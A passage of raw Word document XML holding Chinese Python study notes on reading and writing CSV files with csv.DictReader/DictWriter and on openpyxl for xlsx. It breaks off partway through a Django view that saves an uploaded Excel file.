      <w:bookmarkStart w:id="563" w:name="_Toc159779996"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用字典格式的数据：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有标题行才能使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="563"/>
    </w:p>
    <w:p w14:paraId="40A1D736" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注意数据必须有标题行时才能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCA18BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332420F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>reader=csv.DictReader(f)</w:t>
      </w:r>
      <w:r>
        <w:t>：直接将标题和每一列数据组装成有序字典（</w:t>
      </w:r>
      <w:r>
        <w:t>OrderedDict</w:t>
      </w:r>
      <w:r>
        <w:t>）格式，无须再单独读取标题行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C118BCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">writer=csv.DictWriter(f, </w:t>
      </w:r>
      <w:r>
        <w:t>标题行列表</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>：写入时可使用</w:t>
      </w:r>
      <w:r>
        <w:t>writer.writeheader()</w:t>
      </w:r>
      <w:r>
        <w:t>写入标题，然后使用</w:t>
      </w:r>
      <w:r>
        <w:t>writer.writerow(</w:t>
      </w:r>
      <w:r>
        <w:t>字典格式数据行</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>write.writerows(</w:t>
      </w:r>
      <w:r>
        <w:t>多行数据</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D4324" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7585BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069845FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC16901" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E61565" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DCF88D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with open('data.csv', encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1DFC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    reader = csv.DictReader(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B27AFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for row in reader:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724D709" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(row['name'], row['password'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A44AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61092A23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A26EA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7B2899" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D15711" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0205E6CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header = ['name', 'password', 'status']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3773B564" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D028748" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150CD0B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {'name':'abc', 'password':'123456', 'status':'PASS'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFC430" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {'name':'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 'password':'123#456', 'status':'PASS'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0638C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {'name':'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#abc123', 'password':'123456', 'status':'PASS'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC43B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {'name':'666', 'password':'123456', 'status':'PASS'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7EAA22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {'name':'a b', 'password':'123456', 'status':'PASS'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2551AE59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499A578F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411DF0E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>with open('result2.csv', 'w', encoding='utf-8', newline='') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE98BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    writer = csv.DictWriter(f, header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292682EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    writer.writeheader()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45795FAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    writer.writerows(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F8646D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BDD0660" w14:textId="62FDE933" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="564" w:name="_Toc159779997"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>penpyxl:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xlsx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="564"/>
    </w:p>
    <w:p w14:paraId="065BC861" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6930DD73" w14:textId="380CDA48" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，不能读写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式（此格式参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xlrd</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xlwt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），只能读写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF1D7E" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D9FC40" w14:textId="3DBE354A" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002953BD">
        <w:t>https://blog.csdn.net/David_Dai_1108/article/details/78702032</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5FF0DD" w14:textId="77777777" w:rsidR="002953BD" w:rsidRDefault="002953BD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A959A9F" w14:textId="33F83D2D" w:rsidR="002953BD" w:rsidRDefault="000D62FD" w:rsidP="000D62FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>excel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并导入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7011FBD7" w14:textId="77777777" w:rsidR="000D62FD" w:rsidRDefault="000D62FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E3CEEC" w14:textId="77777777" w:rsidR="000D62FD" w:rsidRDefault="000D62FD" w:rsidP="000D62FD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>import_excel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request</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excel_file = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.FILES[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'exam_file'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    user = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    id = user.id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    user_name = user.name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>将文件保存到某位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>current_time = time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>strftime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"%Y_%m_%d_%H_%M_%S"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>localtime</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filename = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>菜单模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_{current_time}_{id}_{name}.xlsx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>current_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=current_time,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=id,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=user_name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    file_path = os.path.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(EXCEL_IMPORT_QUESTION_ROOT, filename)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
